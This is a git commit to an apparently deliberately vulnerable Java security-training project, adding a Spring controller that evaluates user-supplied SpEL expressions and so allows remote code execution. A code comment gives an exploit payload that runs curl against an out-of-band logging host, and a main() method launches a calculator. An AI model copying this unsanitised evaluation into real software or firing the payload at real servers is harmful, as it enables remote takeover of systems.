add spel, fixes #5

JoyChou93 · JoyChou93 · commit 2f6c3cf62d35 · 2019-01-17T15:07:58.000+08:00
diff --git a/java-sec-code.iml b/java-sec-code.iml
@@ -22,6 +22,15 @@
     </content>
     <orderEntry type="inheritedJdk" />
     <orderEntry type="sourceFolder" forTests="false" />
+    <orderEntry type="module-library">
+      <library>
+        <CLASSES>
+          <root url="jar://$USER_HOME$/Desktop/challenge-0.0.1-SNAPSHOT.jar!/" />
+        </CLASSES>
+        <JAVADOC />
+        <SOURCES />
+      </library>
+    </orderEntry>
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot:1.5.1.RELEASE" level="project" />
diff --git a/src/main/java/org/joychou/controller/SPEL.java b/src/main/java/org/joychou/controller/SPEL.java
@@ -0,0 +1,37 @@
+package org.joychou.controller;
+
+import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+import javax.servlet.http.HttpServletRequest;
+
+/*
+    * Author: JoyChou
+    * Date:   2019年01月17日
+    * Desc:   SPEL导致的RCE
+    * Usage:  http://localhost:8080/spel/rce?expression=xxx(xxx为exp的URL编码后的值)
+    * Exp:    T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+ */
+
+@Controller
+@RequestMapping("/spel")
+public class SPEL {
+
+    @RequestMapping("/rce")
+    @ResponseBody
+    private static String rce(HttpServletRequest request) {
+        String expression = request.getParameter("expression");
+        ExpressionParser parser = new SpelExpressionParser();
+        String result = parser.parseExpression(expression).getValue().toString();
+        return result;
+    }
+
+    public static void main(String[] args)  {
+        ExpressionParser parser = new SpelExpressionParser();
+        String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
+        String result = parser.parseExpression(expression).getValue().toString();
+    }
+}
+
diff --git a/src/main/resources/templates/upload.html b/src/main/resources/templates/upload.html
@@ -4,7 +4,7 @@
 
 <h3>file upload</h3>
 
-<form method="POST" action="/file/upload" enctype="multipart/form-data">
+<form method="POST" action="upload" enctype="multipart/form-data">
     <input type="file" name="file" /><br/><br/>
     <input type="submit" value="Submit" />
 </form>
